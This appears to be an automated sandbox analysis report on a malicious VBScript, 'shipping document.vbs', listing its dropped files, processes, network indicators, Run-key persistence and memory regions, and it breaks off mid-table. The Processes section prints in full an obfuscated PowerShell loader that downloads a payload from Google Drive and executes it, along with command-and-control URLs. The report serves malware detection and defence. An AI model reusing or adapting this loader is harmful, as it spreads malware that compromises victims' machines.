Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
shipping document.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\03F67l1929
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 7
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztt1tkp.iey.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nds2wyu3.ehl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtsip2o5.owx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylha2nxj.qjz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Finindstillingernes119.Uni
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5;
$Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function
Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno.
Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn
Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc
histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1
Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p
';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf
aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl
I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU
ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia
' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd
,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan
Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249
(Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa(
NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o
');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull.
HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel
');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei
SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot
vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR
.krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo
sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd
yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa
dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr
SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249
(Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win
e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa
Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo
rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia
'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg
ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends
urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia
eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss
SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol
SynseOverfbKnudsrSm kit .nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro
') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr
FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste
Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249
(Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi
Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer
TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor
eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen
Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn
CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$
Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$
Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen
Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea
');Standglas249 $Diakonaterne;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5;
$Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function
Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno.
Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn
Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc
histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1
Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p
';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf
aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl
I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU
ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia
' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd
,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan
Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249
(Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa(
NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o
');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull.
HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel
');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei
SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot
vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR
.krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo
sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd
yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa
dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr
SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249
(Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win
e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa
Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo
rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia
'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg
ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends
urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia
eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss
SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol
SynseOverfbKnudsrSm kit .nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro
') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr
FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste
Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249
(Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi
Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer
TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor
eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen
Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn
CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$
Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$
Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen
Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea
');Standglas249 $Diakonaterne;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
|
"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe"
|
|
|
|
C:\Windows\SysWOW64\openfiles.exe
|
"C:\Windows\SysWOW64\openfiles.exe"
|
|
|
|
C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
|
"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.jthzbrdb.fun/3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg==
|
80.240.20.220
|
|
|
|
http://www.a-two-spa-salon.com/3g97/
|
157.7.107.63
|
|
|
|
http://www.a-two-spa-salon.com/3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6
|
157.7.107.63
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
http://www.microsoft.ps/Docs/Repository.htm0
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://hostname.domain.tld/
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.a-two-spa-salon.com
|
157.7.107.63
|
|
|
|
www.mz3fk6g3.sbs
|
172.217.16.36
|
|
|
|
www.jthzbrdb.fun
|
80.240.20.220
|
|
|
|
www.ordinarythoughts.org
|
unknown
|
|
|
|
drive.google.com
|
142.251.41.14
|
||
|
drive.usercontent.google.com
|
142.251.35.161
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
157.7.107.63
|
www.a-two-spa-salon.com
|
Japan
|
|
|
|
80.240.20.220
|
www.jthzbrdb.fun
|
Germany
|
|
|
|
142.251.35.161
|
drive.usercontent.google.com
|
United States
|
||
|
142.251.41.14
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
-PVHSLDXBF
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1FCED5D2000
|
trusted library allocation
|
page read and write
|
|
|
|
84A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
32F0000
|
trusted library allocation
|
page read and write
|
|
|
|
2150000
|
system
|
page execute and read and write
|
|
|
|
26D0000
|
system
|
page execute and read and write
|
|
|
|
21930000
|
unclassified section
|
page execute and read and write
|
|
|
|
43B0000
|
unkown
|
page execute and read and write
|
|
|
|
57E4000
|
trusted library allocation
|
page read and write
|
|
|
|
965B000
|
direct allocation
|
page execute and read and write
|
|
|
|
3280000
|
trusted library allocation
|
page read and write
|
|
|
|
3000000
|
system
|
page execute and read and write
|
|
|
|
4C31000
|
heap
|
page read and write
|
||
|
82C6000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page read and write
|
||
|
2323877D000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2B95000
|
heap
|
page read and write
|
||
|
25CC000
|
unkown
|
page read and write
|
||
|
3471000
|
heap
|
page read and write
|
||
|
4E5C000
|
stack
|
page read and write
|
||
|
232392FA000
|
heap
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page read and write
|
||
|
2C054000
|
system
|
page read and write
|
||
|
8184000
|
heap
|
page read and write
|
||
|
22E4000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887B80000
|
trusted library allocation
|
page read and write
|
||
|
1FDEF000
|
stack
|
page read and write
|
||
|
DD2410D000
|
stack
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
7177000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
unkown
|
page readonly
|
||
|
26D0000
|
direct allocation
|
page read and write
|
||
|
1FCDF34C000
|
trusted library allocation
|
page read and write
|
||
|
4CC7000
|
